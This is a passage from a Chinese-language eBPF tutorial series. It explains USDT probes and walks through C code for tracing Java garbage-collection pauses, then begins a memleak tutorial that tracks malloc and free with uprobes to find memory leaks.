mysqld-2855 [001] d... 19957759.703497: cmd: (0x6dbd40) arg1="SELECT * FROM numbers"
|
||
[...]
|
||
</code></pre>
|
||
<p>这里我们使用了 <code>uprobe</code> 工具,它利用了 Linux 的内置功能:ftrace(跟踪器)和 uprobes(用户级动态跟踪,需要较新的 Linux 版本,例如 4.0 左右)。其他的跟踪器,如 perf_events 和 SystemTap,也可以实现此功能。</p>
|
||
<p>许多其他的 MySQL 函数也可以被跟踪以获取更多的信息。我们可以列出和计算这些函数的数量:</p>
|
||
<pre><code class="language-bash"># ./uprobe -l /opt/bin/mysqld | more
|
||
account_hash_get_key
|
||
add_collation
|
||
add_compiled_collation
|
||
add_plugin_noargs
|
||
adjust_time_range
|
||
[...]
|
||
# ./uprobe -l /opt/bin/mysqld | wc -l
|
||
21809
|
||
</code></pre>
|
||
<p>这有 21,000 个函数。我们也可以跟踪库函数,甚至是单个的指令偏移。</p>
|
||
<p>用户级动态跟踪的能力是非常强大的,它可以解决无数的问题。然而,使用它也有一些困难:需要确定需要跟踪的代码,处理函数参数,以及应对代码的更改。</p>
|
||
<p>用户级静态定义跟踪(User-level Statically Defined Tracing, USDT)则可以在某种程度上解决这些问题。USDT 探针(或者称为用户级 "marker")是开发者在代码的关键位置插入的跟踪宏,提供稳定且已经过文档说明的 API。这使得跟踪工作变得更加简单。</p>
|
||
<p>使用 USDT,我们可以简单地跟踪一个名为 <code>mysql:query__start</code> 的探针,而不是去跟踪那个名为 <code>_Z16dispatch_command19enum_server_commandP3THDPcj</code> 的 C++ 符号,也就是 <code>dispatch_command()</code> 函数。当然,我们仍然可以在需要的时候去跟踪 <code>dispatch_command()</code> 以及</p>
|
||
<p>其他 21,000 个 mysqld 函数,但只有当 USDT 探针无法解决问题的时候我们才需要这么做。</p>
|
||
<p>在 Linux 中的 USDT,无论是哪种形式的静态跟踪点,其实都已经存在了几十年。它最近由于 Sun 的 DTrace 工具的流行而再次受到关注,这使得许多常见的应用程序,包括 MySQL、PostgreSQL、Node.js、Java 等都加入了 USDT。SystemTap 则开发了一种可以消费这些 DTrace 探针的方式。</p>
|
||
<p>你可能正在运行一个已经包含了 USDT 探针的 Linux 应用程序,或者可能需要重新编译(通常是 --enable-dtrace)。你可以使用 <code>readelf</code> 来进行检查,例如对于 Node.js:</p>
|
||
<pre><code class="language-bash"># readelf -n node
|
||
[...]
|
||
Notes at offset 0x00c43058 with length 0x00000494:
|
||
Owner Data size Description
|
||
stapsdt 0x0000003c NT_STAPSDT (SystemTap probe descriptors)
|
||
Provider: node
|
||
Name: gc__start
|
||
Location: 0x0000000000bf44b4, Base: 0x0000000000f22464, Semaphore: 0x0000000001243028
|
||
Arguments: 4@%esi 4@%edx 8@%rdi
|
||
[...]
|
||
stapsdt 0x00000082 NT_STAPSDT (SystemTap probe descriptors)
|
||
Provider: node
|
||
Name: http__client__request
|
||
Location: 0x0000000000bf48ff, Base: 0x0000000000f22464, Semaphore: 0x0000000001243024
|
||
Arguments: 8@%rax 8@%rdx 8@-136(%rbp) -4@-140(%rbp) 8@-72(%rbp) 8@-80(%rbp) -4@-144(%rbp)
|
||
[...]
|
||
</code></pre>
|
||
<p>这就是使用 --enable-dtrace 重新编译的 node,以及安装了提供 "dtrace" 功能来构建 USDT 支持的 systemtap-sdt-dev 包。这里显示了两个探针:node:gc__start(开始进行垃圾回收)和 node:http__client__request。</p>
|
||
<p>在这一点上,你可以使用 SystemTap 或者 LTTng 来跟踪这些探针。然而,内置的 Linux 跟踪器,比如 ftrace 和 perf_events,目前还无法做到这一点(尽管 perf_events 的支持正在开发中)。</p>
|
||
<h2 id="java-gc-介绍"><a class="header" href="#java-gc-介绍">Java GC 介绍</a></h2>
|
||
<p>Java 作为一种高级编程语言,其自动垃圾回收(GC)是其核心特性之一。Java GC 的目标是自动地回收那些不再被程序使用的内存空间,从而减轻程序员在内存管理方面的负担。然而,GC 过程可能会引发应用程序的停顿,对程序的性能和响应时间产生影响。因此,对 Java GC 事件进行监控和分析,对于理解和优化 Java 应用的性能是非常重要的。</p>
|
||
<p>在接下来的教程中,我们将演示如何使用 eBPF 和 USDT 来监控和分析 Java GC 事件的耗时,希望这些内容对你在使用 eBPF 进行应用性能分析方面的工作有所帮助。</p>
|
||
<h2 id="ebpf-实现机制"><a class="header" href="#ebpf-实现机制">eBPF 实现机制</a></h2>
|
||
<p>Java GC 的 eBPF 程序分为内核态和用户态两部分,我们会分别介绍这两部分的实现机制。</p>
|
||
<h3 id="内核态程序"><a class="header" href="#内核态程序">内核态程序</a></h3>
|
||
<pre><code class="language-c">/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */
|
||
/* Copyright (c) 2022 Chen Tao */
|
||
#include <vmlinux.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include <bpf/usdt.bpf.h>
|
||
#include "javagc.h"
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, 100);
|
||
__type(key, uint32_t);
|
||
__type(value, struct data_t);
|
||
} data_map SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
|
||
__type(key, int);
|
||
__type(value, int);
|
||
} perf_map SEC(".maps");
|
||
|
||
__u32 time;
|
||
|
||
static int gc_start(struct pt_regs *ctx)
|
||
{
|
||
struct data_t data = {};
|
||
|
||
data.cpu = bpf_get_smp_processor_id();
|
||
data.pid = bpf_get_current_pid_tgid() >> 32;
|
||
data.ts = bpf_ktime_get_ns();
|
||
bpf_map_update_elem(&data_map, &data.pid, &data, 0);
|
||
return 0;
|
||
}
|
||
|
||
static int gc_end(struct pt_regs *ctx)
|
||
{
|
||
struct data_t data = {};
|
||
struct data_t *p;
|
||
__u32 val;
|
||
|
||
data.cpu = bpf_get_smp_processor_id();
|
||
data.pid = bpf_get_current_pid_tgid() >> 32;
|
||
data.ts = bpf_ktime_get_ns();
|
||
p = bpf_map_lookup_elem(&data_map, &data.pid);
|
||
if (!p)
|
||
return 0;
|
||
|
||
val = data.ts - p->ts;
|
||
if (val > time) {
|
||
data.ts = val;
|
||
bpf_perf_event_output(ctx, &perf_map, BPF_F_CURRENT_CPU, &data, sizeof(data));
|
||
}
|
||
bpf_map_delete_elem(&data_map, &data.pid);
|
||
return 0;
|
||
}
|
||
|
||
SEC("usdt")
|
||
int handle_gc_start(struct pt_regs *ctx)
|
||
{
|
||
return gc_start(ctx);
|
||
}
|
||
|
||
SEC("usdt")
|
||
int handle_gc_end(struct pt_regs *ctx)
|
||
{
|
||
return gc_end(ctx);
|
||
}
|
||
|
||
SEC("usdt")
|
||
int handle_mem_pool_gc_start(struct pt_regs *ctx)
|
||
{
|
||
return gc_start(ctx);
|
||
}
|
||
|
||
SEC("usdt")
|
||
int handle_mem_pool_gc_end(struct pt_regs *ctx)
|
||
{
|
||
return gc_end(ctx);
|
||
}
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
</code></pre>
|
||
<p>首先,我们定义了两个映射(map):</p>
|
||
<ul>
|
||
<li><code>data_map</code>:这个 hashmap 存储每个进程 ID 的垃圾收集开始时间。<code>data_t</code> 结构体包含进程 ID、CPU ID 和时间戳。</li>
|
||
<li><code>perf_map</code>:这是一个 perf event array,用于将数据发送回用户态程序。</li>
|
||
</ul>
|
||
<p>然后,我们有四个处理函数:<code>gc_start</code>、<code>gc_end</code> 和两个 USDT 处理函数 <code>handle_mem_pool_gc_start</code> 和 <code>handle_mem_pool_gc_end</code>。这些函数都用 BPF 的 <code>SEC("usdt")</code> 宏注解,以便在 Java 进程中捕获到与垃圾收集相关的 USDT 事件。</p>
|
||
<p><code>gc_start</code> 函数在垃圾收集开始时被调用。它首先获取当前的 CPU ID、进程 ID 和时间戳,然后将这些数据存入 <code>data_map</code>。</p>
|
||
<p><code>gc_end</code> 函数在垃圾收集结束时被调用。它执行与 <code>gc_start</code> 类似的操作,但是它还从 <code>data_map</code> 中检索开始时间,并计算垃圾收集的持续时间。如果持续时间超过了设定的阈值(变量 <code>time</code>),那么它将数据发送回用户态程序。</p>
|
||
<p><code>handle_gc_start</code> 和 <code>handle_gc_end</code> 是针对垃圾收集开始和结束事件的处理函数,它们分别调用了 <code>gc_start</code> 和 <code>gc_end</code>。</p>
|
||
<p><code>handle_mem_pool_gc_start</code> 和 <code>handle_mem_pool_gc_end</code> 是针对内存池的垃圾收集开始和结束事件的处理函数,它们也分别调用了 <code>gc_start</code> 和 <code>gc_end</code>。</p>
|
||
<p>最后,我们有一个 <code>LICENSE</code> 数组,声明了该 BPF 程序的许可证,这是加载 BPF 程序所必需的。</p>
|
||
<h3 id="用户态程序"><a class="header" href="#用户态程序">用户态程序</a></h3>
|
||
<p>用户态程序的主要目标是加载和运行eBPF程序,以及处理来自内核态程序的数据。它是通过 libbpf 库来完成这些操作的。这里我们省略了一些通用的加载和运行 eBPF 程序的代码,只展示了与 USDT 相关的部分。</p>
|
||
<p>第一个函数 <code>get_jvmso_path</code> 被用来获取运行的Java虚拟机(JVM)的 <code>libjvm.so</code> 库的路径。首先,它打开了 <code>/proc/<pid>/maps</code> 文件,该文件包含了进程地址空间的内存映射信息。然后,它在文件中搜索包含 <code>libjvm.so</code> 的行,然后复制该行的路径到提供的参数中。</p>
|
||
<pre><code class="language-c">static int get_jvmso_path(char *path)
|
||
{
|
||
char mode[16], line[128], buf[64];
|
||
size_t seg_start, seg_end, seg_off;
|
||
FILE *f;
|
||
int i = 0;
|
||
|
||
sprintf(buf, "/proc/%d/maps", env.pid);
|
||
f = fopen(buf, "r");
|
||
if (!f)
|
||
return -1;
|
||
|
||
while (fscanf(f, "%zx-%zx %s %zx %*s %*d%[^\n]\n",
|
||
&seg_start, &seg_end, mode, &seg_off, line) == 5) {
|
||
i = 0;
|
||
while (isblank(line[i]))
|
||
i++;
|
||
if (strstr(line + i, "libjvm.so")) {
|
||
break;
|
||
}
|
||
}
|
||
|
||
strcpy(path, line + i);
|
||
fclose(f);
|
||
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>接下来,我们看到的是将 eBPF 程序(函数 <code>handle_gc_start</code> 和 <code>handle_gc_end</code>)附加到Java进程的相关USDT探针上。每个程序都通过调用 <code>bpf_program__attach_usdt</code> 函数来实现这一点,该函数的参数包括BPF程序、进程ID、二进制路径以及探针的提供者和名称。如果探针挂载成功,<code>bpf_program__attach_usdt</code> 将返回一个链接对象,该对象将存储在skeleton的链接成员中。如果挂载失败,程序将打印错误消息并进行清理。</p>
|
||
<pre><code class="language-c"> skel->links.handle_mem_pool_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid,
|
||
binary_path, "hotspot", "mem__pool__gc__begin", NULL);
|
||
if (!skel->links.handle_mem_pool_gc_start) {
|
||
err = errno;
|
||
fprintf(stderr, "attach usdt mem__pool__gc__begin failed: %s\n", strerror(err));
|
||
goto cleanup;
|
||
}
|
||
|
||
skel->links.handle_mem_pool_gc_end = bpf_program__attach_usdt(skel->progs.handle_gc_end, env.pid,
|
||
binary_path, "hotspot", "mem__pool__gc__end", NULL);
|
||
if (!skel->links.handle_mem_pool_gc_end) {
|
||
err = errno;
|
||
fprintf(stderr, "attach usdt mem__pool__gc__end failed: %s\n", strerror(err));
|
||
goto cleanup;
|
||
}
|
||
|
||
skel->links.handle_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid,
|
||
binary_path, "hotspot", "gc__begin", NULL);
|
||
if (!skel->links.handle_gc_start) {
|
||
err = errno;
|
||
fprintf(stderr, "attach usdt gc__begin failed: %s\n", strerror(err));
|
||
goto cleanup;
|
||
}
|
||
|
||
skel->links.handle_gc_end = bpf_program__attach_usdt(skel->progs.handle_gc_end, env.pid,
|
||
binary_path, "hotspot", "gc__end", NULL);
|
||
if (!skel->links.handle_gc_end) {
|
||
err = errno;
|
||
fprintf(stderr, "attach usdt gc__end failed: %s\n", strerror(err));
|
||
goto cleanup;
|
||
}
|
||
</code></pre>
|
||
<p>最后一个函数 <code>handle_event</code> 是一个回调函数,用于处理从perf event array收到的数据。这个函数会被 perf event array 触发,并在每次接收到新的事件时调用。函数首先将数据转换为 <code>data_t</code> 结构体,然后将当前时间格式化为字符串,并打印出事件的时间戳、CPU ID、进程 ID,以及垃圾回收的持续时间。</p>
|
||
<pre><code class="language-c">static void handle_event(void *ctx, int cpu, void *data, __u32 data_sz)
|
||
{
|
||
struct data_t *e = (struct data_t *)data;
|
||
struct tm *tm = NULL;
|
||
char ts[16];
|
||
time_t t;
|
||
|
||
time(&t);
|
||
tm = localtime(&t);
|
||
strftime(ts, sizeof(ts), "%H:%M:%S", tm);
|
||
printf("%-8s %-7d %-7d %-7lld\n", ts, e->cpu, e->pid, e->ts/1000);
|
||
}
|
||
</code></pre>
|
||
<h2 id="安装依赖-1"><a class="header" href="#安装依赖-1">安装依赖</a></h2>
|
||
<p>构建示例需要 clang、libelf 和 zlib。包名在不同的发行版中可能会有所不同。</p>
|
||
<p>在 Ubuntu/Debian 上,你需要执行以下命令:</p>
|
||
<pre><code class="language-shell">sudo apt install clang libelf1 libelf-dev zlib1g-dev
|
||
</code></pre>
|
||
<p>在 CentOS/Fedora 上,你需要执行以下命令:</p>
|
||
<pre><code class="language-shell">sudo dnf install clang elfutils-libelf elfutils-libelf-devel zlib-devel
|
||
</code></pre>
|
||
<h2 id="编译运行-4"><a class="header" href="#编译运行-4">编译运行</a></h2>
|
||
<p>在对应的目录中,运行 Make 即可编译运行上述代码:</p>
|
||
<pre><code class="language-console">$ make
|
||
$ sudo ./javagc -p 12345
|
||
Tracing javagc time... Hit Ctrl-C to end.
|
||
TIME CPU PID GC TIME
|
||
10:00:01 10% 12345 50ms
|
||
10:00:02 12% 12345 55ms
|
||
10:00:03 9% 12345 47ms
|
||
10:00:04 13% 12345 52ms
|
||
10:00:05 11% 12345 50ms
|
||
</code></pre>
|
||
<p>完整源代码:</p>
|
||
<ul>
|
||
<li><a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/15-javagc">https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/15-javagc</a></li>
|
||
</ul>
|
||
<p>参考资料:</p>
|
||
<ul>
|
||
<li><a href="https://www.brendangregg.com/blog/2015-07-03/hacking-linux-usdt-ftrace.html">https://www.brendangregg.com/blog/2015-07-03/hacking-linux-usdt-ftrace.html</a></li>
|
||
<li><a href="https://github.com/iovisor/bcc/blob/master/libbpf-tools/javagc.c">https://github.com/iovisor/bcc/blob/master/libbpf-tools/javagc.c</a></li>
|
||
</ul>
|
||
<h2 id="总结-13"><a class="header" href="#总结-13">总结</a></h2>
|
||
<p>通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 和 USDT 动态跟踪和分析 Java 的垃圾回收(GC)事件。我们了解了如何在用户态应用程序中设置 USDT 跟踪点,以及如何编写 eBPF 程序来捕获这些跟踪点的信息,从而更深入地理解和优化 Java GC 的行为和性能。</p>
|
||
<p>此外,我们也介绍了一些关于 Java GC、USDT 和 eBPF 的基础知识和实践技巧,这些知识和技巧对于想要在网络和系统性能分析领域深入研究的开发者来说是非常有价值的。</p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门实践教程十六编写-ebpf-程序-memleak-监控内存泄漏"><a class="header" href="#ebpf-入门实践教程十六编写-ebpf-程序-memleak-监控内存泄漏">eBPF 入门实践教程十六:编写 eBPF 程序 Memleak 监控内存泄漏</a></h1>
|
||
<p>eBPF(扩展的伯克利数据包过滤器)是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。</p>
|
||
<p>在本篇教程中,我们将探讨如何使用 eBPF 编写 Memleak 程序,以监控程序的内存泄漏。</p>
|
||
<h2 id="背景及其重要性"><a class="header" href="#背景及其重要性">背景及其重要性</a></h2>
|
||
<p>内存泄漏是计算机编程中的一种常见问题,其严重程度不应被低估。内存泄漏发生时,程序会逐渐消耗更多的内存资源,但并未正确释放。随着时间的推移,这种行为会导致系统内存逐渐耗尽,从而显著降低程序及系统的整体性能。</p>
|
||
<p>内存泄漏有多种可能的原因。这可能是由于配置错误导致的,例如程序错误地配置了某些资源的动态分配。它也可能是由于软件缺陷或错误的内存管理策略导致的,如在程序执行过程中忘记释放不再需要的内存。此外,如果一个应用程序的内存使用量过大,那么系统性能可能会因页面交换(swapping)而大幅下降,甚至可能导致应用程序被系统强制终止(Linux 的 OOM killer)。</p>
|
||
<h3 id="调试内存泄漏的挑战"><a class="header" href="#调试内存泄漏的挑战">调试内存泄漏的挑战</a></h3>
|
||
<p>调试内存泄漏问题是一项复杂且挑战性的任务。这涉及到详细检查应用程序的配置、内存分配和释放情况,通常需要应用专门的工具来帮助诊断。例如,有一些工具可以在应用程序启动时将 malloc() 函数调用与特定的检测工具关联起来,如 Valgrind memcheck,这类工具可以模拟 CPU 来检查所有内存访问,但可能会导致应用程序运行速度大大减慢。另一个选择是使用堆分析器,如 libtcmalloc,它相对较快,但仍可能使应用程序运行速度降低五倍以上。此外,还有一些工具,如 gdb,可以获取应用程序的核心转储并进行后处理以分析内存使用情况。然而,这些工具通常在获取核心转储时需要暂停应用程序,或在应用程序终止后才能调用 free() 函数。</p>
|
||
<h2 id="ebpf-的作用"><a class="header" href="#ebpf-的作用">eBPF 的作用</a></h2>
|
||
<p>在这种背景下,eBPF 的作用就显得尤为重要。eBPF 提供了一种高效的机制来监控和追踪系统级别的事件,包括内存的分配和释放。通过 eBPF,我们可以跟踪内存分配和释放的请求,并收集每次分配的调用堆栈。然后,我们可以分</p>
|
||
<p>析这些信息,找出执行了内存分配但未执行释放操作的调用堆栈,这有助于我们找出导致内存泄漏的源头。这种方式的优点在于,它可以实时地在运行的应用程序中进行,而无需暂停应用程序或进行复杂的前后处理。</p>
|
||
<p><code>memleak</code> eBPF 工具可以跟踪并匹配内存分配和释放的请求,并收集每次分配的调用堆栈。随后,<code>memleak</code> 可以打印一个总结,表明哪些调用堆栈执行了分配,但是并没有随后进行释放。例如,我们运行命令:</p>
|
||
<pre><code class="language-console"># ./memleak -p $(pidof allocs)
|
||
Attaching to pid 5193, Ctrl+C to quit.
|
||
[11:16:33] Top 2 stacks with outstanding allocations:
|
||
80 bytes in 5 allocations from stack
|
||
main+0x6d [allocs]
|
||
__libc_start_main+0xf0 [libc-2.21.so]
|
||
|
||
[11:16:34] Top 2 stacks with outstanding allocations:
|
||
160 bytes in 10 allocations from stack
|
||
main+0x6d [allocs]
|
||
__libc_start_main+0xf0 [libc-2.21.so]
|
||
</code></pre>
|
||
<p>运行这个命令后,我们可以看到分配但未释放的内存来自于哪些堆栈,并且可以看到这些未释放的内存的大小和数量。</p>
|
||
<p>随着时间的推移,很显然,<code>allocs</code> 进程的 <code>main</code> 函数正在泄漏内存,每次泄漏 16 字节。幸运的是,我们不需要检查每个分配,我们得到了一个很好的总结,告诉我们哪个堆栈负责大量的泄漏。</p>
|
||
<h2 id="memleak-的实现原理"><a class="header" href="#memleak-的实现原理">memleak 的实现原理</a></h2>
|
||
<p>在基本层面上,<code>memleak</code> 的工作方式类似于在内存分配和释放路径上安装监控设备。它通过在内存分配和释放函数中插入 eBPF 程序来达到这个目标。这意味着,当这些函数被调用时,<code>memleak</code> 就会记录一些重要信息,如调用者的进程 ID(PID)、分配的内存地址以及分配的内存大小等。当释放内存的函数被调用时,<code>memleak</code> 则会在其内部的映射表(map)中删除相应的内存分配记录。这种机制使得 <code>memleak</code> 能够准确地追踪到哪些内存块已被分配但未被释放。</p>
|
||
<p>对于用户态的常用内存分配函数,如 <code>malloc</code> 和 <code>calloc</code> 等,<code>memleak</code> 利用了用户态探测(uprobe)技术来实现监控。uprobe 是一种用于用户空间应用程序的动态追踪技术,它可以在运行时不修改二进制文件的情况下在任意位置设置断点,从而实现对特定函数调用的追踪。</p>
|
||
<p>对于内核态的内存分配函数,如 <code>kmalloc</code> 等,<code>memleak</code> 则选择使用了 tracepoint 来实现监控。Tracepoint 是一种在 Linux 内核中提供的动态追踪技术,它可以在内核运行时动态地追踪特定的事件,而无需重新编译内核或加载内核模块。</p>
|
||
<h2 id="内核态-ebpf-程序实现"><a class="header" href="#内核态-ebpf-程序实现">内核态 eBPF 程序实现</a></h2>
|
||
<h2 id="memleak-内核态-ebpf-程序实现"><a class="header" href="#memleak-内核态-ebpf-程序实现"><code>memleak</code> 内核态 eBPF 程序实现</a></h2>
|
||
<p><code>memleak</code> 的内核态 eBPF 程序包含一些用于跟踪内存分配和释放的关键函数。在我们深入了解这些函数之前,让我们首先观察 <code>memleak</code> 所定义的一些数据结构,这些结构在其内核态和用户态程序中均有使用。</p>
|
||
<pre><code class="language-c">#ifndef __MEMLEAK_H
|
||
#define __MEMLEAK_H
|
||
|
||
#define ALLOCS_MAX_ENTRIES 1000000
|
||
#define COMBINED_ALLOCS_MAX_ENTRIES 10240
|
||
|
||
struct alloc_info {
|
||
__u64 size; // 分配的内存大小
|
||
__u64 timestamp_ns; // 分配时的时间戳,单位为纳秒
|
||
int stack_id; // 分配时的调用堆栈ID
|
||
};
|
||
|
||
union combined_alloc_info {
|
||
struct {
|
||
__u64 total_size : 40; // 所有未释放分配的总大小
|
||
__u64 number_of_allocs : 24; // 所有未释放分配的总次数
|
||
};
|
||
__u64 bits; // 结构的位图表示
|
||
};
|
||
|
||
#endif /* __MEMLEAK_H */
|
||
</code></pre>
|
||
<p>这里定义了两个主要的数据结构:<code>alloc_info</code> 和 <code>combined_alloc_info</code>。</p>
|
||
<p><code>alloc_info</code> 结构体包含了一个内存分配的基本信息,包括分配的内存大小 <code>size</code>、分配发生时的时间戳 <code>timestamp_ns</code>,以及触发分配的调用堆栈 ID <code>stack_id</code>。</p>
|
||
<p><code>combined_alloc_info</code> 是一个联合体(union),它包含一个嵌入的结构体和一个 <code>__u64</code> 类型的位图表示 <code>bits</code>。嵌入的结构体有两个成员:<code>total_size</code> 和 <code>number_of_allocs</code>,分别代表所有未释放分配的总大小和总次数。其中 40 和 24 分别表示 total_size 和 number_of_allocs这两个成员变量所占用的位数,用来限制其大小。通过这样的位数限制,可以节省combined_alloc_info结构的存储空间。同时,由于total_size和number_of_allocs在存储时是共用一个unsigned long long类型的变量bits,因此可以通过在成员变量bits上进行位运算来访问和修改total_size和number_of_allocs,从而避免了在程序中定义额外的变量和函数的复杂性。</p>
|
||
<p>接下来,<code>memleak</code> 定义了一系列用于保存内存分配信息和分析结果的 eBPF 映射(maps)。这些映射都以 <code>SEC(".maps")</code> 的形式定义,表示它们属于 eBPF 程序的映射部分。</p>
|
||
<pre><code class="language-c">const volatile size_t min_size = 0;
|
||
const volatile size_t max_size = -1;
|
||
const volatile size_t page_size = 4096;
|
||
const volatile __u64 sample_rate = 1;
|
||
const volatile bool trace_all = false;
|
||
const volatile __u64 stack_flags = 0;
|
||
const volatile bool wa_missing_free = false;
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__type(key, pid_t);
|
||
__type(value, u64);
|
||
__uint(max_entries, 10240);
|
||
} sizes SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__type(key, u64); /* address */
|
||
__type(value, struct alloc_info);
|
||
__uint(max_entries, ALLOCS_MAX_ENTRIES);
|
||
} allocs SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__type(key, u64); /* stack id */
|
||
__type(value, union combined_alloc_info);
|
||
__uint(max_entries, COMBINED_ALLOCS_MAX_ENTRIES);
|
||
} combined_allocs SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__type(key, u64);
|
||
__type(value, u64);
|
||
__uint(max_entries, 10240);
|
||
} memptrs SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_STACK_TRACE);
|
||
__type(key, u32);
|
||
} stack_traces SEC(".maps");
|
||
|
||
static union combined_alloc_info initial_cinfo;
|
||
</code></pre>
|
||
<p>这段代码首先定义了一些可配置的参数,如 <code>min_size</code>, <code>max_size</code>, <code>page_size</code>, <code>sample_rate</code>, <code>trace_all</code>, <code>stack_flags</code> 和 <code>wa_missing_free</code>,分别表示最小分配大小、最大分配大小、页面大小、采样率、是否追踪所有分配、堆栈标志和是否工作在缺失释放(missing free)模式。</p>
|
||
<p>接着定义了五个映射:</p>
|
||
<ol>
|
||
<li><code>sizes</code>:这是一个哈希类型的映射,键为进程 ID,值为 <code>u64</code> 类型,存储每个进程的分配大小。</li>
|
||
<li><code>allocs</code>:这也是一个哈希类型的映射,键为分配的地址,值为 <code>alloc_info</code> 结构体,存储每个内存分配的详细信息。</li>
|
||
<li><code>combined_allocs</code>:这是另一个哈希类型的映射,键为堆栈 ID,值为 <code>combined_alloc_info</code> 联合体,存储所有未释放分配的总大小和总次数。</li>
|
||
<li><code>memptrs</code>:这也是一个哈希类型的映射,键和值都为 <code>u64</code> 类型,用于在用户空间和内核空间之间传递内存指针。</li>
|
||
<li><code>stack_traces</code>:这是一个堆栈追踪类型的映射,键为 <code>u32</code> 类型,用于存储堆栈 ID。</li>
|
||
</ol>
|
||
<p>以用户态的内存分配追踪部分为例,主要是挂钩内存相关的函数调用,如 <code>malloc</code>, <code>free</code>, <code>calloc</code>, <code>realloc</code>, <code>mmap</code> 和 <code>munmap</code>,以便在调用这些函数时进行数据记录。在用户态,<code>memleak</code> 主要使用了 uprobes 技术进行挂载。</p>
|
||
<p>每个函数调用被分为 "enter" 和 "exit" 两部分。"enter" 部分记录的是函数调用的参数,如分配的大小或者释放的地址。"exit" 部分则主要用于获取函数的返回值,如分配得到的内存地址。</p>
|
||
<p>这里,<code>gen_alloc_enter</code>, <code>gen_alloc_exit</code>, <code>gen_free_enter</code> 是实现记录行为的函数,他们分别用于记录分配开始、分配结束和释放开始的相关信息。</p>
|
||
<p>函数原型示例如下:</p>
|
||
<pre><code class="language-c">SEC("uprobe")
|
||
int BPF_KPROBE(malloc_enter, size_t size)
|
||
{
|
||
// 记录分配开始的相关信息
|
||
return gen_alloc_enter(size);
|
||
}
|
||
|
||
SEC("uretprobe")
|
||
int BPF_KRETPROBE(malloc_exit)
|
||
{
|
||
// 记录分配结束的相关信息
|
||
return gen_alloc_exit(ctx);
|
||
}
|
||
|
||
SEC("uprobe")
|
||
int BPF_KPROBE(free_enter, void *address)
|
||
{
|
||
// 记录释放开始的相关信息
|
||
return gen_free_enter(address);
|
||
}
|
||
</code></pre>
|
||
<p>其中,<code>malloc_enter</code> 和 <code>free_enter</code> 是分别挂载在 <code>malloc</code> 和 <code>free</code> 函数入口处的探针(probes),用于在函数调用时进行数据记录。而 <code>malloc_exit</code> 则是挂载在 <code>malloc</code> 函数的返回处的探针,用于记录函数的返回值。</p>
|
||
<p>这些函数使用了 <code>BPF_KPROBE</code> 和 <code>BPF_KRETPROBE</code> 这两个宏来声明,这两个宏分别用于声明 kprobe(内核探针)和 kretprobe(内核返回探针)。具体来说,kprobe 用于在函数调用时触发,而 kretprobe 则是在函数返回时触发。</p>
|
||
<p><code>gen_alloc_enter</code> 函数是在内存分配请求的开始时被调用的。这个函数主要负责在调用分配内存的函数时收集一些基本的信息。下面我们将深入探讨这个函数的实现。</p>
|
||
<pre><code class="language-c">static int gen_alloc_enter(size_t size)
|
||
{
|
||
if (size < min_size || size > max_size)
|
||
return 0;
|
||
|
||
if (sample_rate > 1) {
|
||
if (bpf_ktime_get_ns() % sample_rate != 0)
|
||
return 0;
|
||
}
|
||
|
||
const pid_t pid = bpf_get_current_pid_tgid() >> 32;
|
||
bpf_map_update_elem(&sizes, &pid, &size, BPF_ANY);
|
||
|
||
if (trace_all)
|
||
bpf_printk("alloc entered, size = %lu\n", size);
|
||
|
||
return 0;
|
||
}
|
||
|
||
SEC("uprobe")
|
||
int BPF_KPROBE(malloc_enter, size_t size)
|
||
{
|
||
return gen_alloc_enter(size);
|
||
}
|
||
</code></pre>
|
||
<p>首先,<code>gen_alloc_enter</code> 函数接收一个 <code>size</code> 参数,这个参数表示请求分配的内存的大小。如果这个值不在 <code>min_size</code> 和 <code>max_size</code> 之间,函数将直接返回,不再进行后续的操作。这样可以使工具专注于追踪特定范围的内存分配请求,过滤掉不感兴趣的分配请求。</p>
|
||
<p>接下来,函数检查采样率 <code>sample_rate</code>。如果 <code>sample_rate</code> 大于1,意味着我们不需要追踪所有的内存分配请求,而是周期性地追踪。这里使用 <code>bpf_ktime_get_ns</code> 获取当前的时间戳,然后通过取模运算来决定是否需要追踪当前的内存分配请求。这是一种常见的采样技术,用于降低性能开销,同时还能够提供一个代表性的样本用于分析。</p>
|
||
<p>之后,函数使用 <code>bpf_get_current_pid_tgid</code> 函数获取当前进程的 PID。注意这里的 PID 实际上是进程和线程的组合 ID,我们通过右移 32 位来获取真正的进程 ID。</p>
|
||
<p>函数接下来更新 <code>sizes</code> 这个 map,这个 map 以进程 ID 为键,以请求的内存分配大小为值。<code>BPF_ANY</code> 表示如果 key 已存在,那么更新 value,否则就新建一个条目。</p>
|
||
<p>最后,如果启用了 <code>trace_all</code> 标志,函数将打印一条信息,说明发生了内存分配。</p>
|
||
<p><code>BPF_KPROBE</code> 宏用于</p>
|
||
